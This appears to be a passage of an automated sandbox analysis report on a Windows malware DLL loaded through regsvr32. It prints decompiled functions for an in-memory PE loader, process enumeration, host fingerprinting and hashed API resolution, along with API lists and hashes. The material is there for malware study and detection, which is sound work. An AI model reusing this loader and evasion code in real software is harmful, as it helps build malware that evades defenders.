				_t368[0x15] =  *((intOrPtr*)(_t368[0x11] + 6));
				_t211 = _t368[7] ^ 0x000007e6;
				_t313 =  *((intOrPtr*)(_t368[0x49] + 0x80)) - 0xcbc;
				 *((intOrPtr*)(_t387 + 0x24)) = _t313;
				if(_t313 == _t211) {
					L5:
					_t343 = 0x24ad;
					_t368[0x1b] = _t368[0x11] + 0xf8;
					_t368[0x24] = _t368[0x24] * 0x5494;
					if(( *(_t368[0x14] + 0x1c) ^ 0x000002a0) == 0x24ad) {
						L9:
						 *((intOrPtr*)(_t387 + 0x4c)) =  *((intOrPtr*)(_t387 + 0x4c)) + 0x252e;
						_t221 =  *((intOrPtr*)(_t368[0x11] + 0x50)) + 0x00000fff & 0xfffff000;
						_t368[0x30] = _t221;
						_t222 = VirtualAlloc(0, _t221, 0x3000, 0x40); // executed
						_t368[0x10] = _t222;
						if(_t368[0x1d] >= 0x2597) {
							 *((intOrPtr*)(_t368[4] + 0x90)) =  *((intOrPtr*)( *_t368 + 0x168)) - 0x1eee;
						}
						_t368[0xe] = _t368[0xa] - 0x2749;
						_t368[0x34] = _t368[0x34] + 0x21e9 - _t368[0x22];
						E6D509250(_t359, _t368[0x10], 0, _t368[0x30]);
						E6D508CD0(_t368[0x10], _t368[8],  *((intOrPtr*)(_t368[0x11] + 0x54)));
						_t386 = _t387 + 0x18;
						_t344 =  *(_t386 + 0x44);
						if(_t344 <=  *((intOrPtr*)(_t387 + 0x28)) + 0xfffff303) {
							L32:
							goto L33;
						} else {
							_t84 = _t299 - 0x7e8; // -2024
							if(_t344 <= _t84) {
								if(_t368[0x1d] < (_t368[0x4f] * _t368[0xe] & _t374)) {
									_t315 =  *((intOrPtr*)(_t386 + 0x18));
									if(_t315 != (_t368[0x19] ^ _t359) && _t315 > _t299 *  *(_t386 + 0x10)) {
										_t368[0x24] = _t368[0x24] ^ _t368[0x22] + 0x000029d1;
									}
								} else {
									_t368[0x56] = _t368[0x56] - _t368[0x18] +  *((intOrPtr*)(_t386 + 0x18));
									 *(_t386 + 0x24) =  *_t368 | 0x00002749;
									_push(( *(_t386 + 0x2c))[0x5a] *  *(_t386 + 0x40) &  *(_t386 + 0x40));
									_t303 =  *((intOrPtr*)(_t386 + 0x48));
									_t250 = E6D506BBA(_t303,  *(_t386 + 0x30), _t368[0x13] + _t368[9], _t368[0x36] + _t344, 0xffffb260 - _t368[0x4c], ( *(_t386 + 0x2c))[0x45] * _t368[0x4c] | _t368[0x4c],  *((intOrPtr*)(_t386 + 0x38)) - ( *(_t386 + 0x2c))[0x75] ^  *(_t386 + 0x4c), ( *_t368 *  *(_t386 + 0x44) ^  *(_t386 + 0x44)) * (( *(_t386 + 0x2c))[0xf] + 0x2872) *  *(_t386 + 0x10) * 0xffffb260);
									_t386 = _t386 + 0x24;
									_t382 =  *(_t386 + 0x40);
									_t349 =  *(_t303 + 0x1d4) & 0x0000ffff;
									_t363 =  *(_t386 + 0x30);
									_t372 =  *(_t386 + 0x14);
									_push( *((intOrPtr*)(_t303 + 0x100)) - _t382);
									 *((intOrPtr*)(_t386 + 0x3c)) = _t250;
									_push( *(_t303 + 0x13c) & _t349 & 0x0000ffff);
									_push( *((intOrPtr*)(_t386 + 0x54)) + 0x2749);
									_push(_t363 - 0x0000252e & _t382);
									_push(_t349 - 0x4da0);
									InitializeCriticalSection(_t372 ^ 0x000024ad);
									 *((intOrPtr*)(_t303 + 0x124)) = 0xffffd370;
									 *(_t303 + 0x48) =  *(_t303 + 0x48) ^ _t372 & 0x00002201;
									 *((intOrPtr*)(_t303 + 0x1c)) =  *((intOrPtr*)(_t303 + 0x1c)) + (_t372 - 0x00002ab3 &  *(_t386 + 0x44));
									 *((intOrPtr*)(_t303 + 0x3c)) =  *((intOrPtr*)(_t303 + 0x3c)) - _t363 * _t382;
								}
								goto L32;
							}
							_t366 =  *(_t368[0x75] + 0x80) ^ 0x00002ea5;
							while(_t366 < (_t368[0x15] & 0x0000ffff)) {
								_t383 =  *_t368;
								_t350 = _t368[0x1b];
								_t305 =  *(_t383 + 0x1c) * _t366 * 0x4cafdec8 + _t350;
								if(( !( *((intOrPtr*)(_t368[0x11] + 0x3c)) - 1) &  *((intOrPtr*)(_t350 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t368[0x11] + 0x3c))) == 0 ||  *((intOrPtr*)(_t305 + 0x14)) == 0 ||  *((intOrPtr*)(_t305 + 0x10)) == 0) {
									L24:
									_t366 = _t366 + 1;
									continue;
								} else {
									 *((intOrPtr*)(_t368[0x49] + 0x28)) =  *((intOrPtr*)(_t368[0x49] + 0x28)) + 0xffffe185 -  *((intOrPtr*)(_t383 + 0xd0));
									if( *(_t368[0x75] + 0x80) - 0x32d < _t368[0x5e]) {
										_t368[0x60] = _t368[0x60] | _t368[9] * 0x0000252e;
									}
									_t354 = 0x29b2;
									if(( *(_t368[0x22] + 0x1c) ^ 0x00000fb9) == 0x29b2) {
										L21:
										E6D508CD0( *((intOrPtr*)(_t305 + 0xc)) + _t368[0x10],  *((intOrPtr*)(_t305 + 0x14)) + _t368[8],  *((intOrPtr*)(_t305 + 0x10)));
										_t280 = _t368[0x24];
										_t386 = _t386 + 0xc;
										_t332 = 3;
										do {
											_t280 = _t280 * 0x29b3;
											_t332 = _t332 - 1;
										} while (_t332 != 0);
										_t368[0x24] = _t280;
										_t368[9] =  &(_t368[0x35]) * _t368[9];
										 *((intOrPtr*)(_t368[0x1d] + 0x90)) = _t368[0x4f] - 0x24ad;
										goto L24;
									} else {
										do {
											_t354 = _t354 + 1;
											 *(_t368[0x14] + 0x90) = _t368[0x69] | 0x000029b2;
										} while (_t354 != ( *(_t368[0x22] + 0x1c) ^ 0x00000fb9));
										goto L21;
									}
								}
							}
							 *((intOrPtr*)(_t368[0x49] + 0x24)) =  *((intOrPtr*)(_t368[0x49] + 0x24)) +  *((intOrPtr*)(_t368[0x75] + 0x168)) - 0x1e7b;
							goto L32;
						}
					}
					_t306 = _t368[0x2f] * 0x260d;
					_t339 = _t368[0x39];
					_t385 = _t368[0x14];
					do {
						_t339 = _t339 ^ _t306;
						_t343 = _t343 + 1;
						_t368[0x39] = _t339;
					} while (_t343 != ( *(_t385 + 0x1c) ^ 0x000002a0));
					_t299 =  *(_t387 + 0x40);
					_t374 =  *(_t387 + 0x14);
					goto L9;
				} else {
					_t340 = _t368[0x4c];
					_t356 = _t368[2] ^ 0x00002872;
					_t296 = _t211 -  *((intOrPtr*)(_t387 + 0x24));
					do {
						_t340 = _t340 + _t356;
						_t296 = _t296 - 1;
					} while (_t296 != 0);
					_t368[0x4c] = _t340;
					goto L5;
				}
			}









































            0x6d518a5b
            0x6d518a5f
            0x6d518a6e
            0x6d518a74
            0x6d518a7e
            0x6d518a8c
            0x6d518a90
            0x6d518a96
            0x6d518a9a
            0x6d518a9e
            0x6d518aa8
            0x6d518ab2
            0x6d518ac0
            0x6d518f54
            0x6d518f62
            0x6d518f62
            0x6d518acc
            0x6d518ad0
            0x6d518adc
            0x6d518add
            0x6d518ae4
            0x6d518aeb
            0x6d518aec
            0x6d518af3
            0x6d518af7
            0x6d518afe
            0x6d518b02
            0x6d518b03
            0x6d518b0a
            0x6d518b11
            0x6d518b18
            0x6d518b1f
            0x6d518b26
            0x6d518b2d
            0x6d518b34
            0x6d518b3d
            0x6d518b3f
            0x6d518b42
            0x6d518b4a
            0x6d518b57
            0x6d518b62
            0x6d518b68
            0x6d518b6e
            0x6d518b90
            0x6d518b9d
            0x6d518b9f
            0x6d518bac
            0x6d518bbf
            0x6d518bf1
            0x6d518bf4
            0x6d518c0b
            0x6d518c13
            0x6d518c19
            0x6d518c1f
            0x6d518c29
            0x6d518c3c
            0x6d518c3c
            0x6d518c4a
            0x6d518c58
            0x6d518c69
            0x6d518c7a
            0x6d518c83
            0x6d518c86
            0x6d518c91
            0x6d518f52
            0x00000000
            0x6d518c97
            0x6d518c97
            0x6d518c9f
            0x6d518e03
            0x6d518f2e
            0x6d518f36
            0x6d518f4c
            0x6d518f4c
            0x6d518e09
            0x6d518e18
            0x6d518e4d
            0x6d518e92
            0x6d518e9d
            0x6d518ea3
            0x6d518eae
            0x6d518eb1
            0x6d518eb7
            0x6d518ebe
            0x6d518ec2
            0x6d518ec6
            0x6d518ed1
            0x6d518ede
            0x6d518eeb
            0x6d518eec
            0x6d518ef3
            0x6d518efc
            0x6d518f0c
            0x6d518f16
            0x6d518f23
            0x6d518f26
            0x6d518f26
            0x00000000
            0x6d518e03
            0x6d518cb1
            0x6d518dc9
            0x6d518cbc
            0x6d518cbe
            0x6d518cd3
            0x6d518ce2
            0x6d518dc8
            0x6d518dc8
            0x00000000
            0x6d518cfc
            0x6d518d0d
            0x6d518d27
            0x6d518d30
            0x6d518d30
            0x6d518d41
            0x6d518d4d
            0x6d518d73
            0x6d518d84
            0x6d518d89
            0x6d518d8f
            0x6d518d94
            0x6d518d95
            0x6d518d95
            0x6d518d9b
            0x6d518d9b
            0x6d518da6
            0x6d518dbc
            0x6d518dc2
            0x00000000
            0x6d518d4f
            0x6d518d4f
            0x6d518d5a
            0x6d518d5b
            0x6d518d6f
            0x00000000
            0x6d518d4f
            0x6d518d4d
            0x6d518ce2
            0x6d518dec
            0x00000000
            0x6d518dec
            0x6d518c91
            0x6d518bc1
            0x6d518bcb
            0x6d518bd1
            0x6d518bd4
            0x6d518bd4
            0x6d518bd6
            0x6d518bd7
            0x6d518be5
            0x6d518be9
            0x6d518bed
            0x00000000
            0x6d518b70
            0x6d518b73
            0x6d518b79
            0x6d518b7f
            0x6d518b83
            0x6d518b83
            0x6d518b85
            0x6d518b85
            0x6d518b8a
            0x00000000
            0x6d518b8a

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6D518C19
              • Part of subcall function 6D506BBA: LoadLibraryA.KERNEL32(?,?,?,?,?,6D502E8B,?,?,?,?,?,?,?,?,?,?), ref: 6D506C04
            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 6D518EFC
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AllocCriticalInitializeLibraryLoadSectionVirtual
            • String ID: .%
            • API String ID: 485185432-31117204
            • Opcode ID: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction ID: 6a74e3a7684b45281df08fdef07ccf0abe93fc0b371ee74bb2a2e449667a4166
            • Opcode Fuzzy Hash: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction Fuzzy Hash: 67E126716047059FD328CF28C985AABB7F9FF88304F044A6EEA9A8B651D734F944CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ABB07 Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 286 27abb07-27abb2f CreateToolhelp32Snapshot 287 27abb9f-27abba5 286->287 288 27abb31-27abb5a call 27a8f0a Process32First 286->288 291 27abb6a-27abb7a call 27adb70 288->291 292 27abb5c-27abb68 288->292 295 27abb8f-27abb9c FindCloseChangeNotification 291->295 296 27abb7c-27abb8d 291->296 292->287 295->287 296->291 296->295
            C-Code - Quality: 72%
            			E027ABB07(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t38;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E027A8F0A( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						while(1) {
							_t43 = _v312( &_v308, _t33);
							if(_t43 == 0) {
								break;
							}
							_t38 =  *0x27bf8e0; // 0x47ff8c0
							_push( &_v308);
							_push(_t45);
							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x27bf8e0; // 0x47ff8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













            0x027abb1f
            0x027abb21
            0x027abb25
            0x027abb28
            0x027abb2a
            0x027abb2f
            0x027abb3e
            0x027abb46
            0x027abb5a
            0x027abb6a
            0x027abb74
            0x027abb7a
            0x00000000
            0x00000000
            0x027abb7c
            0x027abb86
            0x027abb87
            0x027abb8d
            0x00000000
            0x00000000
            0x00000000
            0x027abb8d
            0x027abb95
            0x027abb9c
            0x027abb5c
            0x027abb5c
            0x027abb62
            0x027abb67
            0x027abb67
            0x027abb5a
            0x027abba5

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 027ABB25
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • Process32First.KERNEL32(00000000,?), ref: 027ABB55
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 027ABB95
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: b0af8d0decce2a2fd46174015c844e8a44f8337ed43d579b9927cdbeb471d1a7
            • Instruction ID: f50eb1344b4ea6a4b23a33de4b44be874f21cf38f55d87abf3b2526c00351bd5
            • Opcode Fuzzy Hash: b0af8d0decce2a2fd46174015c844e8a44f8337ed43d579b9927cdbeb471d1a7
            • Instruction Fuzzy Hash: 68116D726052016BC710EE68EC59F6A77ECFF89674F140E69F520C7180EB34D91587A6
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AC789 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 94%
            			E027AC789(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E027A8F0A(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x27bf8e0; // 0x47ff8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E027A9F8F(_t44, 0x581);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E027A8D41( &_v16);
				_t33 = E027AA5F3(_t43);
				E027A9FEE( &(_t43[E027AA5F3(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E027AA5F3(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E027AE3C8(_t43, E027AA5F3(_t43) + _t40, 0);
			}
















            0x027ac789
            0x027ac792
            0x027ac79e
            0x027ac7a4
            0x027ac7a6
            0x027ac7ae
            0x027ac7bc
            0x027ac7c1
            0x027ac7d0
            0x027ac7db
            0x027ac7e8
            0x027ac802
            0x027ac807
            0x027ac809
            0x027ac810
            0x027ac820
            0x027ac831
            0x027ac83b
            0x027ac843
            0x027ac84a
            0x027ac84d
            0x027ac86a

            APIs
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 027AC7D0
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 027AC802
              • Part of subcall function 027A9FEE: _vsnwprintf.MSVCRT ref: 027AA00B
            • lstrcatW.KERNEL32(?,00000114), ref: 027AC83B
            • CharUpperBuffW.USER32(?,00000000), ref: 027AC84D
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 260891d01e1c8a2a63c168d3e16e5d121ff55001447779bf64158238afbd1687
            • Instruction ID: 685dc0f7fcc2245df78cf285a263480f05ce117d3a68c3dc3b05f681c66e4f54
            • Opcode Fuzzy Hash: 260891d01e1c8a2a63c168d3e16e5d121ff55001447779bf64158238afbd1687
            • Instruction Fuzzy Hash: 6E2174B2D40218BFEB05ABA4DC5DFEE77BDEF84320F104665F601D6180EA749A448F60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D515750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 162 6d515750-6d5157ae 163 6d5157bd-6d5157c7 162->163 164 6d5157b0-6d5157b7 163->164 165 6d5157c9-6d5157cb 163->165 164->163 166 6d5157d4-6d51583d GetProcessHeap 165->166 167 6d5157cd-6d5157cf 165->167 169 6d515864-6d515866 166->169 170 6d51583f-6d515845 166->170 168 6d5158fc-6d515900 167->168 172 6d515868-6d515886 RtlAllocateHeap 169->172 173 6d5158cd-6d5158dd 169->173 171 6d515847-6d51585d 170->171 171->171 176 6d51585f 171->176 177 6d515899-6d5158ca call 6d509250 172->177 178 6d515888-6d515896 172->178 174 6d5158fa 173->174 175 6d5158df-6d5158eb 173->175 174->168 180 6d5158ed-6d5158f2 175->180 176->169 177->173 178->177 180->180 182 6d5158f4 180->182 182->174
            C-Code - Quality: 100%
            			E6D515750() {
				void* __edi;
				signed char _t69;
				void* _t79;
				void* _t80;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				void* _t102;
				void* _t104;
				signed int _t113;
				void* _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				intOrPtr* _t119;
				intOrPtr _t120;
				void* _t122;
				void* _t123;

				_t94 =  *(_t123 + 0xc) & 0x0000ffff;
				_t119 =  *((intOrPtr*)(_t123 + 0x10));
				_t113 = _t94 ^ 0x000029d1;
				 *(_t119 + 0x48) =  *((intOrPtr*)(_t119 + 0x4c)) - 0x260d;
				 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) + 0xffffff28 - _t119;
				_t120 =  *((intOrPtr*)(_t119 + 0x74));
				_t116 =  *(_t119 + 0x8c);
				 *(_t119 + 0x190) = _t113;
				 *(_t119 + 0x90) =  *( *((intOrPtr*)(_t119 + 0x50)) + 0xc4) * 0x29b2;
				_t98 =  *(_t120 + 0x80) ^ 0x00000b8b;
				while(_t98 <= ( *(_t120 + 0x1c) ^ 0x00000322)) {
					_t113 = _t113 + 0x252e;
					_t98 = _t98 + 1;
					 *(_t119 + 0x190) = _t113;
				}
				if(_t116 != 0) {
					_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x124)) + 0x1c)) - 0x260d;
					 *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) =  *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) |  *(_t119 + 0xd0) ^ 0x00002ea5;
					_t69 = M6D53866A; // 0x6f
					 *(_t119 + 0x24) =  *(_t119 + 0x24) | _t94 | _t69 & 0x000000ff;
					_t114 = GetProcessHeap();
					_t102 = 0x1df3;
					 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x88)) + 0x148)) = 0x5b49c1e;
					 *(_t119 + 0x168) =  *(_t119 + 0x168) & 0x00000000;
					if(( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586) == 0x1df3) {
						L9:
						if(_t114 != 0) {
							_t80 = RtlAllocateHeap(_t114, 0, _t116); // executed
							_t122 = _t80;
							if( *((intOrPtr*)(_t119 + 0x130)) >  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x4c)) + 0x3c4) {
								 *(_t119 + 0x48) =  *(_t119 + 0x48) ^  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x1d4)) + 0xf8)) - _t94;
							}
							 *((intOrPtr*)( *(_t119 + 8) + 0x180)) =  *((intOrPtr*)( *(_t119 + 8) + 0x180)) - ( *(_t119 + 0xd8) ^ _t94);
							 *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) =  *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) ^ 0xfffffab9;
							E6D509250(_t116, _t122,  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x50)) + 0x1c)) - 0x260d, _t116);
						}
						_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x10)) + 0x4c)) - 0x76;
						if(_t104 >= 0x2597) {
							L17:
							return _t122;
						} else {
							_t115 =  *(_t119 + 0xd8);
							_t118 =  *(_t119 + 8) * _t94;
							_t79 = 0x2597 - _t104;
							do {
								_t115 = _t115 ^ _t118;
								_t79 = _t79 - 1;
							} while (_t79 != 0);
							 *(_t119 + 0xd8) = _t115;
							goto L17;
						}
					}
					_t95 = _t94 - 0x252e;
					do {
						 *( *_t119 + 0x30) =  *( *_t119 + 0x30) | _t95;
						_t102 = _t102 + 1;
					} while (_t102 != ( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586));
					_t94 =  *(_t123 + 0x18) & 0x0000ffff;
					goto L9;
				}
				return 0;
			}





















            0x6d515751
            0x6d515758
            0x6d51575e
            0x6d515770
            0x6d51577a
            0x6d515783
            0x6d515786
            0x6d515796
            0x6d51579c
            0x6d5157a8
            0x6d5157bd
            0x6d5157b0
            0x6d5157b6
            0x6d5157b7
            0x6d5157b7
            0x6d5157cb
            0x6d5157e9
            0x6d5157f4
            0x6d5157fc
            0x6d515806
            0x6d51580f
            0x6d515811
            0x6d51581c
            0x6d51582c
            0x6d51583d
            0x6d515864
            0x6d515866
            0x6d51586c
            0x6d515875
            0x6d515886
            0x6d515896
            0x6d515896
            0x6d5158a5
            0x6d5158b1
            0x6d5158c5
            0x6d5158ca
            0x6d5158d8
            0x6d5158dd
            0x6d5158fa
            0x00000000
            0x6d5158df
            0x6d5158e2
            0x6d5158e8
            0x6d5158eb
            0x6d5158ed
            0x6d5158ed
            0x6d5158ef
            0x6d5158ef
            0x6d5158f4
            0x00000000
            0x6d5158f4
            0x6d5158dd
            0x6d515845
            0x6d515847
            0x6d515849
            0x6d51584c
            0x6d51585b
            0x6d51585f
            0x00000000
            0x6d51585f
            0x00000000

            APIs
            • GetProcessHeap.KERNEL32(?,?,?,?,6D5045B2,?,00002EA5,?,?,6D51A749,?,?,?,0000074E,?,000003A9), ref: 6D515809
            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 6D51586C
            Strings
            • oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop, xrefs: 6D5157FC
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: Heap$AllocateProcess
            • String ID: oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop
            • API String ID: 1357844191-1397620714
            • Opcode ID: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction ID: 3bd6a178568c2d6294888b88cf8e613908255cec89ac3f85d2395a9daef9d129
            • Opcode Fuzzy Hash: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction Fuzzy Hash: FA513A356047018FD768CF39C894AA6B7F1FF48311F11896EE5AACBB91DB31A805CB10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AEFB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 183 27aefb8-27aefcf 184 27af02c 183->184 185 27aefd1-27aeff9 183->185 186 27af02e-27af032 184->186 185->184 187 27aeffb-27af01e call 27aa5da call 27ae3c8 185->187 192 27af033-27af04a 187->192 193 27af020-27af02a 187->193 194 27af04c-27af054 192->194 195 27af0a0-27af0a2 192->195 193->184 193->187 194->195 196 27af056 194->196 195->186 197 27af058-27af05e 196->197 198 27af06e-27af07f 197->198 199 27af060-27af062 197->199 201 27af081-27af082 198->201 202 27af084-27af090 LoadLibraryA 198->202 199->198 200 27af064-27af06c 199->200 200->197 200->198 201->202 202->184 203 27af092-27af09c GetProcAddress 202->203 203->184 204 27af09e 203->204 204->186
            C-Code - Quality: 100%
            			E027AEFB8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E027AE3C8( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E027AA5DA( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























            0x027aefc1
            0x027aefc3
            0x027aefc6
            0x027aefc9
